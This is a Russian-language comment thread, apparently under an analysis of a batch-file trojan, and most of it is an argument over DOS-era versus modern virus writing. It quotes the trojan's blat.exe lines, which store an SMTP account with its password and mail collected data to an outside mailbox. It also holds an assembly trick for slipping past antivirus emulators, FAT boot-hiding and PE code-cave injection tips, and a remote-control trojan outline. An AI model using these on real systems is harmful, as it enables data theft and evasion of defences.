Comments 76
А к почте вы как доступ получили?
blat.exe -install -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptscэто строка в батнике install.bat записывает в реестр аккаунт, с которого отсылается почта. %SYSTEMROOT%/help/win32/blat.exe %systemroot%/help/win32/ip.txt -to ufanetcom2@yandex.ru. exitэта строка отправляет указанный файл на указанный адрес.письмо отправилось на свой же ящик.
Да и просниффать можно элементарно, тут же нет ssl.
Становится грустно, когда видишь вирусы-трояны размером чуть ли не в мегабайт, кое-как написанные вот так вот на дельфях с батниками (а то и вообще иной раз на визуал бейсике!) Что туда можно запихать, что они столько весить начинают? С ностальгией вспоминаю досовские резидентные вирусы, эти настоящие шедевры искусства по паре сотен байт…
А вы писали резиденские вирусы под дос? Нету там никого шедевра искусства. Все более чем примитивно.
На мой взгляд создание вот такого синтезированного вируса который использует и батники, и шел, и радмин и прочее существенно сложнее.
А резидент под дос что, там все просто как пять копеек.
Если уж и вспоминать что-то так это полностью полиморфные вирусы которые могли модифицировать свой код без повторяющихся сигнатур. Ну и там все не так сложно.
На мой взгляд создание вот такого синтезированного вируса который использует и батники, и шел, и радмин и прочее существенно сложнее.
А резидент под дос что, там все просто как пять копеек.
Если уж и вспоминать что-то так это полностью полиморфные вирусы которые могли модифицировать свой код без повторяющихся сигнатур. Ну и там все не так сложно.
Загуглите по фразе «Virus.DOS.Small». Думаю, написать самораспространяющийся код размером меньше 150 байт (если не ошибаюсь, самое меньшее было 59 байт), который вдобавок сидит в памяти резидентом — не такая уж тривиальная задача. Тем более что в некоторых были действительно оригинальные решения для работы с файлами, маскировки и обхода антивирусов. Первые руткиты именно так и появились — перехватывали функции по работе с файлами 21h прерывания или работе с диском 13h прерывания и делали вид, что «нас тут не было».
А вот такие трояны, которые используют кучу библиотек, весящие столько, сколько не каждая прикладная программа весит… У меня они вызывают отвращение. Написать удаленное управление рабочим столом — дело пары часов, и весить оно будет уж точно не 100 килобайт. В отдельном потоке сокет прослушивает определенный порт, затем по нехитрому протоколу посылает серверу снимки экрана (используя тот же BitBlt/StretchBlt), перемещая курсор через SetCursorPos и эмулируя нажатия клавиш через keybd_event. Качество получится похуже, чем у RAdmin, но работать вполне можно. Простейший FTP-клиент тоже реализуется быстро и в несколько килобайт откомпилированного кода. Зачем тут столько всякой фигни размером в полметра — можно только гадать.
А вот такие трояны, которые используют кучу библиотек, весящие столько, сколько не каждая прикладная программа весит… У меня они вызывают отвращение. Написать удаленное управление рабочим столом — дело пары часов, и весить оно будет уж точно не 100 килобайт. В отдельном потоке сокет прослушивает определенный порт, затем по нехитрому протоколу посылает серверу снимки экрана (используя тот же BitBlt/StretchBlt), перемещая курсор через SetCursorPos и эмулируя нажатия клавиш через keybd_event. Качество получится похуже, чем у RAdmin, но работать вполне можно. Простейший FTP-клиент тоже реализуется быстро и в несколько килобайт откомпилированного кода. Зачем тут столько всякой фигни размером в полметра — можно только гадать.
Мой первый ком стелс резиден вирус был написан мною в восьмом классе. После наверно двух месяцев после того как я получил 268-той в свое распоряжение в ВЦ лицея и узнал что такое ассемблер.
Назвать руткитом перехвать 21 и 13 прерывания исскуством назвать можно было только в восмедесятых годах, дай бог. И то, на мой взгляд это скорее рутина.
Уменьшение размера com-ников — тоже не рокет сайнс. Я конечно успехов не добился.
Например я писал отображение графического файла на экран.
Добился как я помню толи 56-толи 58 байт. Рекорд был что-то порядка 48 байт.
Все писалось максимум за 5-6 дней.
Все это мифология.
Назвать руткитом перехвать 21 и 13 прерывания исскуством назвать можно было только в восмедесятых годах, дай бог. И то, на мой взгляд это скорее рутина.
Уменьшение размера com-ников — тоже не рокет сайнс. Я конечно успехов не добился.
Например я писал отображение графического файла на экран.
Добился как я помню толи 56-толи 58 байт. Рекорд был что-то порядка 48 байт.
Все писалось максимум за 5-6 дней.
Все это мифология.
Не совсем мифология. Требовался вполне определенный уровень знаний. Который очень непросто было получить. Не так много литературы, отсутствовал или был ограничен доступ к Интернету.
Сейчас для того чтобы считать себя «хакером», порог требования сильно снизился. Достаточно уметь нагуглить пару тройку советов и спросить «почему не работает» на форумах.
Сейчас для того чтобы считать себя «хакером», порог требования сильно снизился. Достаточно уметь нагуглить пару тройку советов и спросить «почему не работает» на форумах.
порог требований*
Ой. А зачем Интернет-то? Было фидо, были BBS, gopher в конце концов :)
Информации было море, по крайней мере в девяностых и дальше.
Опять же повторюсь — чтобы сделать поделку выше и чтобы сделать ком стелс резидент вирус под dos нужно примерно одинаковое вхождение и одинаковое время.
Информации было море, по крайней мере в девяностых и дальше.
Опять же повторюсь — чтобы сделать поделку выше и чтобы сделать ком стелс резидент вирус под dos нужно примерно одинаковое вхождение и одинаковое время.
Вирусы под дос были весьма простые. Хотя бы из-за этого самого ограничения на размер, в 100-200 байт ничего сложного впихнуть физически не получится.
Сейчас есть куда более любопытные вещи. Намного более любопытные. Конечно они как бы «теряются» на фоне массы всяких винлокеров и прочей убогости, но только как бы. Есть много весьма забавных экземпляров. Полиморфных, красиво обходящих антивирусы, не забывающих записать себя в mbr.
Да и посмотрите на трояны с помощью которых сформированы современные крупные ботнеты. Они весьма сложны и красивы, жаль, что исходников от большинства из них нет…
Сейчас есть куда более любопытные вещи. Намного более любопытные. Конечно они как бы «теряются» на фоне массы всяких винлокеров и прочей убогости, но только как бы. Есть много весьма забавных экземпляров. Полиморфных, красиво обходящих антивирусы, не забывающих записать себя в mbr.
Да и посмотрите на трояны с помощью которых сформированы современные крупные ботнеты. Они весьма сложны и красивы, жаль, что исходников от большинства из них нет…
угу, погоняйте несжатые данные полных экранов, погоняйте :)
А я ничего и не говорил про сжатие. Для него можно использовать тот же zlib, плюс можно уменьшать размеры передаваемого изображения (хотя бы через StretchBlt).
Посчитайте поток данных, который необходим для передачи картинки с разрешением хотя бы 1024 × 786. Гораздо логичнее передавать картинку только измененных областей, а для типичных операций типа заливки градиентом — только параметры операции. Смешно также использовать zlib (о май гад!) для сжатия картинок. Уменьшая размер картинки, вы снижаете возможность распознавать текст. Управлять компьютером-жертвой, двигая мышку тоже не самый удобный способ (плюс, можно спалиться). Вы видимо совсем ничего не понимаете ни в передаче видео, ни в написании троянов.
Вы прям рассказали мне мой первый троян, написанный в 9 классе: анализ экрана, передача сообщения нажатий кнопки, рисование на экране, областях и окнах, перемещение мыши не было: мышка сама встала на область и нажимала. доступ к файловой системе, реестру и прочему в скрытом режиме. возможность создания скрытых окон (на минус областях)… Это творение занимало ~200 килобайт (не запакованное) и написано было на дельфе…
Гм. Пройду по порядку:
1. Несжатая картинка 1024x768x24 весит 18 метров. 1024x768x8 весит 768 килобайт. Несжатые вряд ли какой канал потянет, так что см. ниже.
2. Передача измененных областей — это да, будет лучше. Но если измененных областей слишком много, то проще передать картинку целиком.
3. zlib для сжатия картинок использовать пусть и смешно, но можно. Сжимать он сжимает, потерь нет. В сжатом виде картинка весит меньше — канал нужен тоньше. Логичнее было бы использовать для сжатия тот же JPEG, но это приведет к большему увеличению размера программы.
4. Уменьшать размер картинки можно по-разному. Например, передавая в первом пакете четные строки, а во втором — нечетные. Тоже довольно глупо, но работать опять-таки будет.
5. Управлять компьютером лучше всего с помощью telnet+ftp (или ssh+sftp). Однако в данном случае рассматривается вариант с управлением типа «удаленный рабочий стол». Вообще, можно было бы вполне использовать встроенный в винду mstsc и подключаться к нему по RDP.
6. В передаче видео я действительно мало что понимаю. Однако в написании троянов кое-что смыслю. В данном случае вы или не поняли мое высказывание («как сделать простейшее управление удаленным рабочим столом, общие черты»), либо решили потроллить.
1. Несжатая картинка 1024x768x24 весит 18 метров. 1024x768x8 весит 768 килобайт. Несжатые вряд ли какой канал потянет, так что см. ниже.
2. Передача измененных областей — это да, будет лучше. Но если измененных областей слишком много, то проще передать картинку целиком.
3. zlib для сжатия картинок использовать пусть и смешно, но можно. Сжимать он сжимает, потерь нет. В сжатом виде картинка весит меньше — канал нужен тоньше. Логичнее было бы использовать для сжатия тот же JPEG, но это приведет к большему увеличению размера программы.
4. Уменьшать размер картинки можно по-разному. Например, передавая в первом пакете четные строки, а во втором — нечетные. Тоже довольно глупо, но работать опять-таки будет.
5. Управлять компьютером лучше всего с помощью telnet+ftp (или ssh+sftp). Однако в данном случае рассматривается вариант с управлением типа «удаленный рабочий стол». Вообще, можно было бы вполне использовать встроенный в винду mstsc и подключаться к нему по RDP.
6. В передаче видео я действительно мало что понимаю. Однако в написании троянов кое-что смыслю. В данном случае вы или не поняли мое высказывание («как сделать простейшее управление удаленным рабочим столом, общие черты»), либо решили потроллить.
Попробую раскрыть. На мой взгляд если взять современного программера под десктоп.
И попросить его написать что-то типа шифрующего стелс резидент вируса под дос — то он справиться. Там все прямолинейно.
А вот такую жуткую смесь с нуля создать — на мой взгляд нужно усилий существенно больше.
И попросить его написать что-то типа шифрующего стелс резидент вируса под дос — то он справиться. Там все прямолинейно.
А вот такую жуткую смесь с нуля создать — на мой взгляд нужно усилий существенно больше.
А что по вашему означает написание?
Навешивание поверх своего обезьянего кода полиморфных движков? Перехват прерываний копипастой из Абеля?
История развития вирусописательства в Дос это соревнование на тот момент профессионалов кто может сделать лучше.
Каждый новый вирус, достойный внимания, был своего рода произведением искусства.
Судя по тому как Вы отзываетесь об этой теме Вам не случалось анализировать код таких шедевров как Voloceraptor или Viking. У Вас не тряслись руки от одного имени Imaginer и желание как можно быстрее запустить ida чтобы понять какие новые палнки для тебя были поставлены.
Современное вирусописательство ничего кроме улыбки, в основной своей массе, у динозавров не вызывает.
Навешивание поверх своего обезьянего кода полиморфных движков? Перехват прерываний копипастой из Абеля?
История развития вирусописательства в Дос это соревнование на тот момент профессионалов кто может сделать лучше.
Каждый новый вирус, достойный внимания, был своего рода произведением искусства.
Судя по тому как Вы отзываетесь об этой теме Вам не случалось анализировать код таких шедевров как Voloceraptor или Viking. У Вас не тряслись руки от одного имени Imaginer и желание как можно быстрее запустить ida чтобы понять какие новые палнки для тебя были поставлены.
Современное вирусописательство ничего кроме улыбки, в основной своей массе, у динозавров не вызывает.
Из того что вы перечислили я помню только Viking и помню что его разбор занял бувально пару дней. И то я к это времени уже с вирусами не баловался.
Что там было сложное? Ну разве механим заражения exe файлов.
Что-то более менее сложное появилось уже в году только 98-мом. И называть это просто резидентными вирусами никак нельзя.
И то повторюсь, из интересного там были только полиморфы и споротивление отладки.
Создание вирусов было интересным в году так 70-75-том. К моему рождению там уже мало чего было интересного.
Что там было сложное? Ну разве механим заражения exe файлов.
Что-то более менее сложное появилось уже в году только 98-мом. И называть это просто резидентными вирусами никак нельзя.
И то повторюсь, из интересного там были только полиморфы и споротивление отладки.
Создание вирусов было интересным в году так 70-75-том. К моему рождению там уже мало чего было интересного.
Расскажите как мне, каким простым образом вы бы обманывали такие вещи как Adinf?
Расскажите мне что вы знаете о технологиях, когда даже на машине загруженной с чистой системой антивирусное ПО не могло обнаружить факт компромитации?
Расскажите мне что вы знаете о вирусах, обнаружение которых требовало от сканера минимум 10 минут анализа каждого файла на машине 386Dx40.
И потом мы с Вами побеседуем о том, какое было простое вирусописательство под Дос.
Расскажите мне что вы знаете о технологиях, когда даже на машине загруженной с чистой системой антивирусное ПО не могло обнаружить факт компромитации?
Расскажите мне что вы знаете о вирусах, обнаружение которых требовало от сканера минимум 10 минут анализа каждого файла на машине 386Dx40.
И потом мы с Вами побеседуем о том, какое было простое вирусописательство под Дос.
Прошло более полутра десятков лет.
Но кстати, если вы назавете резидентный вирус под dos который обманывал ADinf — то мне самому будет интересно. Если Adinf был запущен то обмануть его можно было специфично достаочно — типа насрать куда-то или там с видео буфером химичить не помню. Чисто его технологически нельзя было обмануть.
AIDSTest обманывали помню.
Про шифрование OneHalf — самый распространеный в этом плане вирус. И там, вы удивитесь — простой XOR млин. И то имел косяк в себе, шифруя сам себя с утерей ключа.
Все алгоримы шифрования в тот момент — это алгоритмы шестидесятых годов. Чего там нового?
Вирусы никогда не привносили ничего нового — не вплане полиморфов, ни в плане шифрования. Это всегда была компиляция старых алгоритмах и решений.
Может быть в 7X годах и было что-то сложное. До в 9X вирус мирового «качества» мог написать подросток из школы. Что и происходило.
Но кстати, если вы назавете резидентный вирус под dos который обманывал ADinf — то мне самому будет интересно. Если Adinf был запущен то обмануть его можно было специфично достаочно — типа насрать куда-то или там с видео буфером химичить не помню. Чисто его технологически нельзя было обмануть.
AIDSTest обманывали помню.
Про шифрование OneHalf — самый распространеный в этом плане вирус. И там, вы удивитесь — простой XOR млин. И то имел косяк в себе, шифруя сам себя с утерей ключа.
Все алгоримы шифрования в тот момент — это алгоритмы шестидесятых годов. Чего там нового?
Вирусы никогда не привносили ничего нового — не вплане полиморфов, ни в плане шифрования. Это всегда была компиляция старых алгоритмах и решений.
Может быть в 7X годах и было что-то сложное. До в 9X вирус мирового «качества» мог написать подросток из школы. Что и происходило.
Да обманывали. Назову вам минимум три.
ЗАРАЗА Veloceraptor Demiurg
Более того Veloceraptor обманывал Adinf на машине загруженной с чистой системы с эталонными базами всех файлов.
Как спросите Вы?
Как же так отвечу Вам я. Ведь написание вирусов под Дос такое простое дело.
А очень просто. В Fat существование такая штука как метка тома. Которая фактически была фиктивной записью в таблице размещения файлов с определнным атрибутом. Анализ загрузчика Дос показал, что ему совершенно все равно какой атрибут стоит на системно файле. Для него было главным местоположение записи в таблице.
В результате, подменив системный файл фиктивной записью о метке тома, с указанием первого кластера на тело вируса мы получали загрузку вируса еще до страта ОС. Плюс, существующие на то время антивирусные программы даже не пытались анализировать такие записи. Предполагая что это все ги лишь запись о метке тома.
Demiurg работал иначе. Он создавал условия при которых Adinf не мог использовать контроллер жесткого диска на прямую и переходил на стандартное int 13 перывание контролировать которое было дело техники.
Aidstest это всего лишь сканер сигнатур. Обманывался он копиистами из тойже книжки абеля.
Про onefalh вы не правы. Там не обычный ксор. В любом случае фишка лоадера onehalfa была не в алгоритме шифрации своего тела, а в том каким образом генерировался сам расшифровщик и где и как он находился.
Про вирусы ничего не приносили. Вы снова неправы. Вирусы в то время, как и сейчас любое другое вредоносное ПО стимулирует разработчиков операционных систем писать более качественный код.
В 7x годах. Ни один подросток не мог написать вирус мирового качества. Уже хотя бы потому, что существующие в паблике полиморфные движки детектировались существущим антивирусным ПО. А написать свой — нужно было быть специалистом высокого класса.
На закате ДОС появились вирусы, которые были целыми виртуальными машинами, Выступающими в качестве супервайзера для операционной системы. Вам нужно обьяснять что такое написать свою виртуальную машину?
Безусловно, современные ОС на порядки сложнее ДОС. И это требует от системного программиста больших знаний. Но проблема то в том, что в плоскость компьютеров пришла масса обычных пользователей. Чего во времена ДОС не было. От того сложность механизмов скрывающих работу вируса не в пример ДОС проще.
В них просто нет необходимости.
ЗАРАЗА Veloceraptor Demiurg
Более того Veloceraptor обманывал Adinf на машине загруженной с чистой системы с эталонными базами всех файлов.
Как спросите Вы?
Как же так отвечу Вам я. Ведь написание вирусов под Дос такое простое дело.
А очень просто. В Fat существование такая штука как метка тома. Которая фактически была фиктивной записью в таблице размещения файлов с определнным атрибутом. Анализ загрузчика Дос показал, что ему совершенно все равно какой атрибут стоит на системно файле. Для него было главным местоположение записи в таблице.
В результате, подменив системный файл фиктивной записью о метке тома, с указанием первого кластера на тело вируса мы получали загрузку вируса еще до страта ОС. Плюс, существующие на то время антивирусные программы даже не пытались анализировать такие записи. Предполагая что это все ги лишь запись о метке тома.
Demiurg работал иначе. Он создавал условия при которых Adinf не мог использовать контроллер жесткого диска на прямую и переходил на стандартное int 13 перывание контролировать которое было дело техники.
Aidstest это всего лишь сканер сигнатур. Обманывался он копиистами из тойже книжки абеля.
Про onefalh вы не правы. Там не обычный ксор. В любом случае фишка лоадера onehalfa была не в алгоритме шифрации своего тела, а в том каким образом генерировался сам расшифровщик и где и как он находился.
Про вирусы ничего не приносили. Вы снова неправы. Вирусы в то время, как и сейчас любое другое вредоносное ПО стимулирует разработчиков операционных систем писать более качественный код.
В 7x годах. Ни один подросток не мог написать вирус мирового качества. Уже хотя бы потому, что существующие в паблике полиморфные движки детектировались существущим антивирусным ПО. А написать свой — нужно было быть специалистом высокого класса.
На закате ДОС появились вирусы, которые были целыми виртуальными машинами, Выступающими в качестве супервайзера для операционной системы. Вам нужно обьяснять что такое написать свою виртуальную машину?
Безусловно, современные ОС на порядки сложнее ДОС. И это требует от системного программиста больших знаний. Но проблема то в том, что в плоскость компьютеров пришла масса обычных пользователей. Чего во времена ДОС не было. От того сложность механизмов скрывающих работу вируса не в пример ДОС проще.
В них просто нет необходимости.
У нас сильно разное понимание что такое специалист высокого класса.
Повторюсь полностью полиморфные вирусы при мне писали ученики 8-9 класса.
Им до специалиста высокого класса было еще лет так десять минимум.
А за информацию спасибо.
P.S. И в onehalf таки было обыкновенный xor :)
Повторюсь полностью полиморфные вирусы при мне писали ученики 8-9 класса.
Им до специалиста высокого класса было еще лет так десять минимум.
А за информацию спасибо.
P.S. И в onehalf таки было обыкновенный xor :)
Да прекратите рассказывать сказки про учеников 8 -9 класса.
Очевидно же что слово племорфный означает всего лишь то что по смещению байт код нельзя получить сигнатуру. Это не является показателем качества.
Показателем качества является такой полиморфный механизм который максимально сложно подается анализу.
Вы выдумываете из головы что угодно лишь бы спасти свое лицо, и создать видимость человека в теме. На само деле нахватилсь по верхам не владеет даже базовым обьемом знаний по теме.
В onehalf ксоорм шифровались сектора диска. А не тело вируса. Но и это не имеет значение в случае с ним.
Антивирус чтобы диагностировать вирус должен получить с достаточной долей уверенности соответствие сигнатур. Чтобы получить сигнатуру, нужно расшифровать тело. Чтобы расшифровать тело — нужно получить ключ из деокдера.
Декодере onehalf пресдствалял из себя набор из 5 до 12 (в зависимости от версии) пятен кода рандомно разбрасываемых по телу зараженного файла. Каждый из кусков кода состояли из большого количества мусорных инструкции и инструкции занимающихся действительно расшифровкой тела.
Печально, когда вот такие дилетанты, начинаю множить невежество.
Очевидно же что слово племорфный означает всего лишь то что по смещению байт код нельзя получить сигнатуру. Это не является показателем качества.
Показателем качества является такой полиморфный механизм который максимально сложно подается анализу.
Вы выдумываете из головы что угодно лишь бы спасти свое лицо, и создать видимость человека в теме. На само деле нахватилсь по верхам не владеет даже базовым обьемом знаний по теме.
В onehalf ксоорм шифровались сектора диска. А не тело вируса. Но и это не имеет значение в случае с ним.
Антивирус чтобы диагностировать вирус должен получить с достаточной долей уверенности соответствие сигнатур. Чтобы получить сигнатуру, нужно расшифровать тело. Чтобы расшифровать тело — нужно получить ключ из деокдера.
Декодере onehalf пресдствалял из себя набор из 5 до 12 (в зависимости от версии) пятен кода рандомно разбрасываемых по телу зараженного файла. Каждый из кусков кода состояли из большого количества мусорных инструкции и инструкции занимающихся действительно расшифровкой тела.
Печально, когда вот такие дилетанты, начинаю множить невежество.
Я нигде не утверждал что я в теме :) Я утверждал что я писал резидентные дос вирусы, о котором была речь в начале этой ветки. И что там ничего сложного.
Полиморфный в моих словах означал что каждая копия вируса не имела общих сигнатур с предыдущей. Хотя и делала одно и тоже. Собственно это и есть полиморфный движок — изменить кусок кода так чтобы не было общих сигнатур при сохранении функциональности.
Но раз мы уже дошли до личностей я резюмирую и закончим.
Средний уровень вирусописателей времен доса и сейчас одинаков.
Уровень знаний (читай времени) потраченный на создание поделки описанной в посте как минимум соответствует уровню знаний для написания стелс резидент вируса в 9X годах, хотя по моему мнению нужно больше.
Вещи уровня onehalf соответствуют современным вирусам и руткитам.
Вот и все. Никакого превосходства вирусо писателей того времени нет.
Полиморфный в моих словах означал что каждая копия вируса не имела общих сигнатур с предыдущей. Хотя и делала одно и тоже. Собственно это и есть полиморфный движок — изменить кусок кода так чтобы не было общих сигнатур при сохранении функциональности.
Но раз мы уже дошли до личностей я резюмирую и закончим.
Средний уровень вирусописателей времен доса и сейчас одинаков.
Уровень знаний (читай времени) потраченный на создание поделки описанной в посте как минимум соответствует уровню знаний для написания стелс резидент вируса в 9X годах, хотя по моему мнению нужно больше.
Вещи уровня onehalf соответствуют современным вирусам и руткитам.
Вот и все. Никакого превосходства вирусо писателей того времени нет.
И опять-таки вы неправы. Ассемблер сам по себе является более сложным, чем любой ЯВУ. Соответственно уровень знаний должен быть выше.
У большинства полиморфных вирусов есть участки кода, которые мало меняются от заражения к заражению, и они являются декодерами. Правда, размер у них довольно-таки мал, но тем не менее декодер вполне может являться устойчивой сигнатурой вируса. Написать полностью полиморфный вирус — дело более сложное.
Стелс-вирус должен уметь прятаться от существующих антивирусов. В девяностых основными антивирусами (по меньшей мере, на территории бСССР) были AIDSTest, DrWeb и McAffee. Способов скрыться от них было довольно мало, причем среди основных было просто не дать запуститься антивирусу. Продвинутые стелс-вирусы являлись как раз руткитами, перехватывая обращения к файлам и диску и делая вид, что их нет. Ну и естественно, использовалось дублирование, шифрование и т. п.
Для подобного пятиминутных знаний ассемблера явно недостаточно. А тому, кто его только начал изучать, будет недостаточно мелких, обыденных знаний, которые часто не упоминаются в книгах: например, использование XOR AX, AX вместо MOV AX, 0.
Сейчас же большинство новых троянов — либо модификации старых, либо нечто на визуал бейсике или дельфях размером в несколько сотен килобайт. Никакого полиморфизма, никакого скрытия от антивирусов.
У большинства полиморфных вирусов есть участки кода, которые мало меняются от заражения к заражению, и они являются декодерами. Правда, размер у них довольно-таки мал, но тем не менее декодер вполне может являться устойчивой сигнатурой вируса. Написать полностью полиморфный вирус — дело более сложное.
Стелс-вирус должен уметь прятаться от существующих антивирусов. В девяностых основными антивирусами (по меньшей мере, на территории бСССР) были AIDSTest, DrWeb и McAffee. Способов скрыться от них было довольно мало, причем среди основных было просто не дать запуститься антивирусу. Продвинутые стелс-вирусы являлись как раз руткитами, перехватывая обращения к файлам и диску и делая вид, что их нет. Ну и естественно, использовалось дублирование, шифрование и т. п.
Для подобного пятиминутных знаний ассемблера явно недостаточно. А тому, кто его только начал изучать, будет недостаточно мелких, обыденных знаний, которые часто не упоминаются в книгах: например, использование XOR AX, AX вместо MOV AX, 0.
Сейчас же большинство новых троянов — либо модификации старых, либо нечто на визуал бейсике или дельфях размером в несколько сотен килобайт. Никакого полиморфизма, никакого скрытия от антивирусов.
В свое время я обходил антивирусы следующим образом:
тело вируса шифровалось с проивзольным ключем(ключ сохранялся) — как вы выражаетесь «бональным ксором», а при расшифровке делалась следующая манипуляция
xor ax,ax
@do:
in ax,40h
cmp ax, [realkey]
jne @do
…
далее с ax расшифровываем наше тело
Дело в том, что в виртуальной машине антивирусников того времени, не была эмуляции портов
тело вируса шифровалось с проивзольным ключем(ключ сохранялся) — как вы выражаетесь «бональным ксором», а при расшифровке делалась следующая манипуляция
xor ax,ax
@do:
in ax,40h
cmp ax, [realkey]
jne @do
…
далее с ax расшифровываем наше тело
Дело в том, что в виртуальной машине антивирусников того времени, не была эмуляции портов
Писать на ассемблере в чистом ДОС было не таким уж сложным из-за простоты и полной доступности самой системы. Сравните процентное кол-во недокументированных функций (это значит вам неизвестных) в ОС тогда и сейчас. Та система была практически открытой, а сейчас никто ничего не раскрывает, вы же понимаете.
Да ладно, ладно, длиннее у вас, длиннее, уговорили. :)
«Расскажите мне что вы знаете о вирусах, обнаружение которых требовало от сканера минимум 10 минут анализа каждого файла на машине 386Dx40.»
Расскажи-те мне пожалуйста вот про это.
Или речь идет о проборе ключа для XOR?
Дык, я и сейчас могу свой i7 по это дело хоть на сутки загрузить.
Расскажи-те мне пожалуйста вот про это.
Или речь идет о проборе ключа для XOR?
Дык, я и сейчас могу свой i7 по это дело хоть на сутки загрузить.
И про динозавров. Я знаком с некоторыми людьми чьи творения на базе вирусописательства были достаточно известны (печально) на мировом уровне того времени.
Вот спросил одного сейчас — он ответил что современные вирусы на его взгляд, на порядок сложнее чем то что было тогда.
Вот спросил одного сейчас — он ответил что современные вирусы на его взгляд, на порядок сложнее чем то что было тогда.
Сейчас большинство вирусов (вернее, вирусов как таковых сейчас практически нет, просто по привычке так называют) пишется на ЯВУ, причем криво-косо. Написание шифрующего стелс резидента под дос требует определенных навыков в ассемблере, умения работать с прерываниями, знания недокументированных структур и функций DOS, а также множество других тонкостей. Так что придется сначала учить ассемблер, потом штурмовать справочник Брауна по прерываниям, и так далее и тому подобное. У меня в свое время получилось лишь нечто в полтора-два килобайта размером, внедряющееся в exe и com файлы, и ломающее содержимое первых 100h байт. Попробуйте сами ;-)
«Умение работать с прерываниями» звучит страшно. А в реальности это было пару дней обучения.
Что такое «недокументированная структура» DOS?
Какие там недокументированные функции в дос-е то? Все там к моем рождению уже было задокументировано по самое неболуйся.
И повторюсь я пробовал.
На создание ком стелс резидента у меня ушла неделя.
Инфекцирование exe файлов еще неделя.
Более менее сложное было создание полного полиморфа. Я например не до конца написал, надоело. А мои со-лициисты в 8-мом классе написали.
Что такое «недокументированная структура» DOS?
Какие там недокументированные функции в дос-е то? Все там к моем рождению уже было задокументировано по самое неболуйся.
И повторюсь я пробовал.
На создание ком стелс резидента у меня ушла неделя.
Инфекцирование exe файлов еще неделя.
Более менее сложное было создание полного полиморфа. Я например не до конца написал, надоело. А мои со-лициисты в 8-мом классе написали.
Как минимум, некоторые недокументированные функции 21h прерывания. Плюс различные системные структуры, которые также были недокументированы. Часть из них использовалась некоторыми вирусами для своих целей.
На мой взгляд если взять современного программера под десктоп. И попросить его написать что-то типа шифрующего стелс резидент вируса под дос — то он справиться.Лол, вот Вы загнули.
Кстати, вопрос. Вы не могли бы подсказать мне кое что, судя по всему вы большой знаток windows portable executable format. Мне нужно безопасно (повторяю) безопасно вписать блоб данных в windows файл. Какая порция его была бы наиболее приемлимой для нужд сохранения информации? (я не пишу вирусы, просто нужно запихать байнари данные в экзэшник, да так чтобы никакие компрессоры его не могли порушить). Для Mach-O файлов (MacOSX) я нашел способ модифицирования таблицы символов (внешние библиотеки линкуемые ld). Существует ли подобная вещь для PE?
Есть в PE-файлах так называемые CodeCave так вот туда можно не только данные вписать, но и вполне рабочий ассемблерный код.
Есть статья на англицком: www2.inf.fh-bonn-rhein-sieg.de/~ikarim2s/how2injectcode/code_inject.html
И ее перевод: www.xaker.name/forvb/showthread.php?t=22158
Ну и хекс-редактором можно в пустые области записывать данные, это в секции ресурсов, как правило. Тут скорее от конкретного файла зависит. Я не особо разбирался с этим, если честно.
Есть статья на англицком: www2.inf.fh-bonn-rhein-sieg.de/~ikarim2s/how2injectcode/code_inject.html
И ее перевод: www.xaker.name/forvb/showthread.php?t=22158
Ну и хекс-редактором можно в пустые области записывать данные, это в секции ресурсов, как правило. Тут скорее от конкретного файла зависит. Я не особо разбирался с этим, если честно.
Я правильно понимаю, что тем, кто сидит за натом этот вирус ничего плохого не сделает?
UFO just landed and posted this here
Сие творение без палева установится только у юзера с административными правами и выключенным UAC.
Остаётся надееться что хотя бы таких кто выключает UAC — не много.
Хотя если они сами этот файл запустят, там что угодно может быть =)
Остаётся надееться что хотя бы таких кто выключает UAC — не много.
Хотя если они сами этот файл запустят, там что угодно может быть =)
«консольному почтовому клеинту» исправьте пожалуйста)
Школовирус — писать троян на bat-файлах, это, конечно, сильно. Но с другой стороны, антивирусы наверно не осилят разбор bat-файла, так что может оно того и стоит. А вообще, я в очередной раз повторю, пока ОС будут разрешать (хоть с тысячью предупреждений) запускать программы из сети и давать им полный досту п к компьютеру, вирусные эпидемии не прекратятся.
Что же по-вашему файлы из сети вообще должно быть невозможно запустить? Если на то пошло, то любой файл на вашем компьютере так или иначе может быть загружен из сети.
Надеюсь вы всерьез не предлагаете вернуться к дискам с софтом, купленным у пиратов на развале, чтобы не качать «потенциально опасные» файлы из сети?
Надеюсь вы всерьез не предлагаете вернуться к дискам с софтом, купленным у пиратов на развале, чтобы не качать «потенциально опасные» файлы из сети?
> Что же по-вашему файлы из сети вообще должно быть невозможно запустить?
Файл должен скачиваться в локальную ФС без атрибута исполняемости. А исполняемым скачанный файл должен становиться только посте того, как пользователь явно добавит право execute на этот файл.
А уж софт так и вовсе нужно качать из проверенных и зарекомендовавших себя репозиториев, никаких файлопомоек.
Файл должен скачиваться в локальную ФС без атрибута исполняемости. А исполняемым скачанный файл должен становиться только посте того, как пользователь явно добавит право execute на этот файл.
А уж софт так и вовсе нужно качать из проверенных и зарекомендовавших себя репозиториев, никаких файлопомоек.
В Windows 7 все скаченые файлы изначально заблокированы от простого запуска, даже если программа не требует административных прав, при запуске вас UAC спросит, вы действительно хотите запустить/открыть файл скаченый из интернета?
И в свойствах файла есть заветная кнопочка Unblock — дабы UAC успокоился на счёт того откуда этот файл.
И в свойствах файла есть заветная кнопочка Unblock — дабы UAC успокоился на счёт того откуда этот файл.
Нет, не совсем. Добавление права execute ничего не меняет, так как: 1) вы вряд ли способны определить опасность файла, это невозможно сделать даже программой (кто-то вроде доказал теорему о том, что невозможно 100% точно за конечное время автоматизированными средствами определить, яваляется ли программа вредоносной) 2) пользователя можно мотивировать поставить нужную галочку, написав что программа содержит что-нибудь интересное для него.
Ваше решение — типичный пример перекладывания проблемы с малокомпетентного человека (разработчика) на абсолютно некомпетентного, вместо ее решения, типичный майкрософтовско-линуксовый подход.
Более правильное решение — радикально ограничить права программ с неизвестным источником: запретить доступ к любым файлам кроме своих, и явно выбранных пользователем, запретить возможность скрытого запуска и выполнения такой программы, предоставить надежный индикатор для определения запущенной в данный момент программы, предоставить возможность в любой момент надежно завершить выполнение программы и удалить ее.
Если программам требуются повышенные привилегии, они должны быть подписаны цифр. подписью разработчиков системы, и передачу прав должен явно одобрить пользователь. При этом и для таких программ должна соблюдаться невозможность скрытого запуска, и невозможность предотвратить завершение и удаление программы.
Как-то так.
